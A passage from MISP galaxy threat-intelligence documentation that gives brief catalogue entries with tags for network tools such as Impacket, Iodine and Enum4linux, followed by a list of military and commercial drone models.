IMPACKET is a Python library that allows for interaction with various network protocols. It is particularly effective in environments that rely on Active Directory and related Microsoft Windows network services.

The tag is: misp-galaxy:tool="IMPACKET"

Table 16817. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

IODINE

IODINE is a network traffic tunneler that allows for tunneling of IPv4 traffic over DNS.

The tag is: misp-galaxy:tool="IODINE"

Table 16818. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

ENUM4LINUX

ENUM4LINUX is a Linux Perl script for enumerating data from Windows and Samba hosts.

The tag is: misp-galaxy:tool="ENUM4LINUX"

Table 16819. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

UAVs/UCAVs

Unmanned Aerial Vehicles / Unmanned Combat Aerial Vehicles.

UAVs/UCAVs is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Enes AYATA

R18

R18

The tag is: misp-galaxy:uavs="R18"

KBLA-IVT

KBLA-IVT

The tag is: misp-galaxy:uavs="KBLA-IVT"

Autel Evo II

Autel Evo II

The tag is: misp-galaxy:uavs="Autel Evo II"

DJI Mavic Series

DJI Mavic Series

The tag is: misp-galaxy:uavs="DJI Mavic Series"

Golden Eagle

Golden Eagle

The tag is: misp-galaxy:uavs="Golden Eagle"

Skydio X2

Skydio X2

The tag is: misp-galaxy:uavs="Skydio X2"

RQ-4 Global Hawk

RQ-4 Global Hawk

The tag is: misp-galaxy:uavs="RQ-4 Global Hawk"

Orion

Orion

The tag is: misp-galaxy:uavs="Orion"

Bayraktar TB2

Bayraktar TB2

The tag is: misp-galaxy:uavs="Bayraktar TB2"

UJ-22 Airborne

UJ-22 Airborne

The tag is: misp-galaxy:uavs="UJ-22 Airborne"

Forpost

Forpost

The tag is: misp-galaxy:uavs="Forpost"

Zala 421

Zala 421

The tag is: misp-galaxy:uavs="Zala 421"

PD-1 People’s Drone

PD-1 People’s Drone

The tag is: misp-galaxy:uavs="PD-1 People’s Drone"

Tupolev Tu-141 Strizh

Tupolev Tu-141 Strizh

The tag is: misp-galaxy:uavs="Tupolev Tu-141 Strizh"

WB FlyEye

WB FlyEye

The tag is: misp-galaxy:uavs="WB FlyEye"

Granat-4

Granat-4

The tag is: misp-galaxy:uavs="Granat-4"

Orlan-10

Orlan-10

The tag is: misp-galaxy:uavs="Orlan-10"

Orlan-30

Orlan-30

The tag is: misp-galaxy:uavs="Orlan-30"

Quantum Systems Vector

Quantum Systems Vector

The tag is: misp-galaxy:uavs="Quantum Systems Vector"

Spectator

Spectator

The tag is: misp-galaxy:uavs="Spectator"

RQ-20 Puma

RQ-20 Puma

The tag is: misp-galaxy:uavs="RQ-20 Puma"

E95

E95

The tag is: misp-galaxy:uavs="E95"

Tupolev Tu-143 Reis

Tupolev Tu-143 Reis

The tag is: misp-galaxy:uavs="Tupolev Tu-143 Reis"

Zastava

Zastava

The tag is: misp-galaxy:uavs="Zastava"

Punisher

Punisher

The tag is: misp-galaxy:uavs="Punisher"

Mini-Bayraktar

Mini-Bayraktar

The tag is: misp-galaxy:uavs="Mini-Bayraktar"

Takion

Takion

The tag is: misp-galaxy:uavs="Takion"

Leleka-100 “Stork”

Leleka-100 “Stork”

The tag is: misp-galaxy:uavs="Leleka-100 “Stork”"

Athlon Avia A1-CM Furia

Athlon Avia A1-CM Furia

The tag is: misp-galaxy:uavs="Athlon Avia A1-CM Furia"

Eleron-3

Eleron-3

The tag is: misp-galaxy:uavs="Eleron-3"

AeroVironment Quantix

AeroVironment Quantix

The tag is: misp-galaxy:uavs="AeroVironment Quantix"

Switchblade 300

Switchblade 300

The tag is: misp-galaxy:uavs="Switchblade 300"

Switchblade 600

Switchblade 600

The tag is: misp-galaxy:uavs="Switchblade 600"

Phoenix Ghost

Phoenix Ghost

The tag is: misp-galaxy:uavs="Phoenix Ghost"

WB Group Warmate

WB Group Warmate

The tag is: misp-galaxy:uavs="WB Group Warmate"

Zala KYB

Zala KYB

The tag is: misp-galaxy:uavs="Zala KYB"